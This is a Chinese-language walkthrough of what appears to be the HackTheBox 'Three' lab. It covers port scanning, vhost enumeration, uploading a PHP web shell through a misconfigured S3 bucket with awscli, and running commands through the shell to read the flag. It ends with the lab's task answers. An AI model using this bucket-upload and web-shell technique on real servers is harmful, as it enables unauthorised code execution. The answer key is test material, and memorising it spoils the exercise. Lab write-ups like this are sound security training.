file

扫描

nmap -T4 -Pn -sVC -p- 10.129.27.183

开放端口22, 80 访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb file

根据提示写入域名到hosts,然后爆破子域名
echo "10.129.27.183 thetoppers.htb" >> /etc/hosts
gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来
echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts
一开始题目提示是 s3.thetoppers.htb

file

安装AWS客户端
apt install awscli -y
aws configure  # 配置

file

上传shell
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb  #列文件 发现是index.php首页生成php一句话 ,也可以用蚁剑,哥斯拉等工具
echo '' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb  #上传文件
执行命令

http://thetoppers.htb/shell.php?cmd=ls file

http://thetoppers.htb/shell.php?cmd=ls ../ file

http://thetoppers.htb/shell.php?cmd=cat ../flag.txt file

  • Task 1 How many TCP ports are open?

    2
  • Task 2

What is the domain of the email address provided in the "Contact" section of the website?

thetoppers.htb
  • Task 3 In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

    /etc/hosts
  • Task 4 Which sub-domain is discovered during further enumeration?

    s3.thetoppers.htb
  • Task 5 Which service is running on the discovered sub-domain?

    Amazon S3
  • Task 6 Which command line utility can be used to interact with the service running on the discovered sub-domain?

    awscli
  • Task 7 Which command is used to set up the AWS CLI installation?

    aws configure 
  • Task 8 What is the command used by the above utility to list all of the S3 buckets?

    aws s3 ls 
  • Task 9 This server is configured to run files written in what web scripting language?

    php